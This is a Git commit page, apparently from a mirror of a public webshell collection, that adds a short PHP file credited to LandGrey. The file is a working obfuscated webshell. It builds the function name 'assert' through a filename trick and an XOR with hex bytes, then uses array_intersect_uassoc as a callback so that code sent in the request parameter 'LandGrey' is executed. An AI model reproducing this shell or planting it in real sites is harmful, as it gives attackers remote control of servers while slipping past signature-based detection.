mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
Create array_intersect_uassoc-filename-last-char-must-be-s.php
from : https://github.com/LandGrey author : LandGrey
This commit is contained in:
parent
b80ff30285
commit
c8ee47f1c4
1 changed files with 6 additions and 0 deletions
|
@ -0,0 +1,6 @@
|
|||
<?php
|
||||
$password = "LandGrey";
|
||||
${"LandGrey"} = substr(__FILE__,-5,-4) . "class";
|
||||
$f = $LandGrey ^ hex2bin("12101f040107");
|
||||
array_intersect_uassoc(array($_REQUEST[$password] => ""), array(1), $f);
|
||||
?>
|
Loading…
Reference in a new issue